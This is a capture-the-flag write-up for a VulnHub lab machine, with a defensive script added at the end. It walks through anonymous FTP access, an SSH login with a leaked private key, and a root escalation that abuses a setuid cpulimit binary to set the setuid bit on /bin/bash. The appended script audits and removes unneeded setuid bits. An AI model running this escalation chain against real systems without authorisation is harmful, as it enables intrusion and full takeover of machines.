ONSYSTEM: SHELLDREDD #1 HANNAH VulnHub writeup

Oline77
Nov 29, 2020


I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.

nmap -p- -A <IP>

Let’s log in to FTP as anonymous:

Change into the .hannah directory (maybe hannah is a user) and get id_rsa. Now try to connect over SSH as hannah:

chmod 600 id_rsa
ssh -i id_rsa hannah@<IP> -p 61000
Works

Now it’s time for privilege escalation. Use the following command to search for SUID/SGID files:

find / -type f -perm /6000 -ls 2>/dev/null
Found an interesting one

Use this site to find an exploit for cpulimit. Try to understand how it works before running the exploit.

cpulimit -l 100 -f whoami

With this command we can become root:

cpulimit -l 100 -f chmod +s /bin/bash
/bin/bash -p
Root!

Cat the flag:

…well done
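
From the defender's side, the finding on this machine is a setuid cpulimit that runs whatever command it is given with the file owner's privileges. The script below is an added example, not part of the original write-up: it lists setuid/setgid files that are missing from a reviewed allowlist and strips the bits from one that should not carry them. The function names and the allowlist file (one absolute path per line) are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: audit setuid/setgid files against a reviewed allowlist.
# Assumption: the allowlist is a plain text file, one absolute path per line.
# Usage (hypothetical allowlist path): audit_setid / /etc/setid.allow

# audit_setid ROOT ALLOWLIST
# Prints every setuid/setgid regular file under ROOT that is not allowlisted.
audit_setid() {
    root=$1
    allow=$2
    # "-perm -4000 -o -perm -2000" matches the same files as the write-up's
    # "-perm /6000" (setuid OR setgid), spelled in the portable form.
    # -xdev keeps the walk on one filesystem (skips /proc, network mounts).
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r path; do
        # Fixed-string, whole-line match: no regex or prefix surprises.
        # A missing allowlist makes grep fail, so everything gets reported.
        if ! grep -Fxq -- "$path" "$allow" 2>/dev/null; then
            printf '%s\n' "$path"
        fi
    done
}

# strip_setid FILE
# Removes the setuid and setgid bits from a file that does not need them,
# which is the fix for a helper like cpulimit that executes other commands.
strip_setid() {
    chmod u-s,g-s -- "$1"
}
```

Running the audit on a schedule and diffing its output against the previous run turns a newly added setuid binary into an alert instead of a surprise.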
